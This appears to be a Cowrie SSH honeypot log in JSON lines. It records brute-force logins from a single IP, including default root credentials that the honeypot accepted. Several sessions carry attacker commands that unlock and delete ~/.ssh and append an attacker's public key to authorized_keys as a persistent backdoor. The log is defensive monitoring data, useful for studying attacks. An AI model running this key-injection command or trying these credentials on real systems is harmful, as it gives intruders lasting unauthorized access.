{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:24.508537Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:44:25.227300Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:44:25.227969Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:44:25.539547Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:25.540413Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49822,"dst_ip":"1.2.3.4","dst_port":22,"session":"5446023a1aad","protocol":"ssh","message":"New connection: 212.227.235.229:49822 (1.2.3.4:22) [session: 5446023a1aad]","sensor":"my-vps","timestamp":"2025-09-09T01:44:25.725577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:25.726227Z","src_ip":"212.227.235.229","session":"5446023a1aad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:25.974999Z","src_ip":"212.227.235.229","session":"5446023a1aad"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:44:27.012533Z","src_ip":"212.227.235.229","session":"5446023a1aad"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:28.264252Z","src_ip":"212.227.235.229","session":"5446023a1aad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49838,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3ecc38cfeaa","protocol":"ssh","message":"New connection: 212.227.235.229:49838 (1.2.3.4:22) [session: c3ecc38cfeaa]","sensor":"my-vps","timestamp":"2025-09-09T01:44:28.513785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:28.514440Z","src_ip":"212.227.235.229","session":"c3ecc38cfeaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:28.762455Z","src_ip":"212.227.235.229","session":"c3ecc38cfeaa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:44:29.793281Z","src_ip":"212.227.235.229","session":"c3ecc38cfeaa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:30.042876Z","src_ip":"212.227.235.229","session":"c3ecc38cfeaa"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:30.101796Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36872,"dst_ip":"1.2.3.4","dst_port":22,"session":"438fe2d803ad","protocol":"ssh","message":"New connection: 212.227.235.229:36872 (1.2.3.4:22) [session: 438fe2d803ad]","sensor":"my-vps","timestamp":"2025-09-09T01:44:43.303423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:43.304417Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:43.424761Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.login.success","username":"root","password":"vmware","message":"login attempt [root/vmware] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:44:43.948923Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:44:44.243952Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.244821Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.246329Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.367933Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:44:44.625994Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.626867Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.749878Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.750847Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36878,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b2d5f85ca86","protocol":"ssh","message":"New connection: 212.227.235.229:36878 (1.2.3.4:22) [session: 9b2d5f85ca86]","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.866818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.867668Z","src_ip":"212.227.235.229","session":"9b2d5f85ca86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:44.986445Z","src_ip":"212.227.235.229","session":"9b2d5f85ca86"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:44:45.501071Z","src_ip":"212.227.235.229","session":"9b2d5f85ca86"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:46.622365Z","src_ip":"212.227.235.229","session":"9b2d5f85ca86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37088,"dst_ip":"1.2.3.4","dst_port":22,"session":"90e046b89025","protocol":"ssh","message":"New connection: 212.227.235.229:37088 (1.2.3.4:22) [session: 90e046b89025]","sensor":"my-vps","timestamp":"2025-09-09T01:44:46.741899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:46.742575Z","src_ip":"212.227.235.229","session":"90e046b89025"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:46.862348Z","src_ip":"212.227.235.229","session":"90e046b89025"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:44:47.381019Z","src_ip":"212.227.235.229","session":"90e046b89025"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:47.501638Z","src_ip":"212.227.235.229","session":"438fe2d803ad"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:47.502635Z","src_ip":"212.227.235.229","session":"90e046b89025"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46000,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fa9df8a49f7","protocol":"ssh","message":"New connection: 212.227.235.229:46000 (1.2.3.4:22) [session: 3fa9df8a49f7]","sensor":"my-vps","timestamp":"2025-09-09T01:44:58.120448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:58.121438Z","src_ip":"212.227.235.229","session":"3fa9df8a49f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:58.229061Z","src_ip":"212.227.235.229","session":"3fa9df8a49f7"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T01:44:58.701882Z","src_ip":"212.227.235.229","session":"3fa9df8a49f7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:59.813811Z","src_ip":"212.227.235.229","session":"3fa9df8a49f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44806,"dst_ip":"1.2.3.4","dst_port":22,"session":"de7039403259","protocol":"ssh","message":"New connection: 212.227.235.229:44806 (1.2.3.4:22) [session: de7039403259]","sensor":"my-vps","timestamp":"2025-09-09T01:45:10.232758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:10.233995Z","src_ip":"212.227.235.229","session":"de7039403259"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:10.472466Z","src_ip":"212.227.235.229","session":"de7039403259"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:11.462008Z","src_ip":"212.227.235.229","session":"de7039403259"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:12.702698Z","src_ip":"212.227.235.229","session":"de7039403259"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32818,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d45f47b0a3c","protocol":"ssh","message":"New connection: 212.227.235.229:32818 (1.2.3.4:22) [session: 1d45f47b0a3c]","sensor":"my-vps","timestamp":"2025-09-09T01:45:15.485506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:15.486410Z","src_ip":"212.227.235.229","session":"1d45f47b0a3c"}
